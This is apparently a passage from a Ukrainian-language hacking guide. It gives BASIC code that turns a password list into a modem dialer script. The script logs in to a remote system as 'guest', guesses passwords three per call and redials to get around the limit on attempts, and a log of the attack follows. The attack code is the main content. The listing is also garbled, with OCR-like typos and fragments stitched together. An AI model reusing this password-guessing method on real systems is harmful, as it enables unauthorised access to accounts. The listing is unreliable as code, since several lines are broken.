PRINT 12, "dial
DATA " + Chr$(34)+ "5551235" + Chr$(34)
DO UNTIL EOF(l)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "ЛМ" PRINT #2, "waitfor " + Chr$(34)+ "
Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ "
guest" '+ Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ "
Password:" + Chr$(34)
PRINT tt2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LOOP
PRINT #2, "endproc"

Подвійна ідентифікація, обмежене число спроб

Четвертий домен є розвитком третього. Доячи проникнення в систему четвертого домена потрібно вгадати ім'я користувача і пароль при обмеженому числі спроб. Після невдалого використання заданого числа спроб потрібно відновити розірване з'єднання. Розглянемо приклад роботи системи і програму генерації відповідного сценарію. У наступному лістингу містяться результати атаки цільової системи. 

Xx-jul-xx 09:55:08 91ХХХ5551234
З: CONNECT 9600/arq/v32/lapm
Username: guest
Password: xxxxxxxx
Username: guest
Password: xxxxxxxx
Username: gues.t
Password: xxxxxxxx
+++

OPEN "5551235.was" FOR OUTPUT AS #2
OPEN "LIST.txt" FOR INPUT AS #1
PRINT #2, "proc main"
DO UNTIL EOF(l) PRINT #2, "dial
DATA " + Chr$(34)+ "5551235" + Chr$(34)
LINE INPUT #1, in$
in$ = LTRIMS(in$)+ "ЛМ"
PRINT #2, "waitfor " + Chr$(34)+ "
Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ "
guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ "
Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "ЛМ" PRINT #2, "waitfor " + Chr$(34)+ "
Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ "
guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ "
Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + CHRS(34)
LINE INPUT #1, in$
in$ = Ltrim$(in$)+ "AM"
PRINT #2, "waitfor " + Chr$(34)+ "
Username:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ "
guest" + Chr$(34)
PRINT #2, "waitfor " + Chr$(34)+ "
Password:" + Chr$(34)
PRINT #2, "transmit " + Chr$(34)+ in$ + Chr$(34) LOOP PRINT #2, "endproc"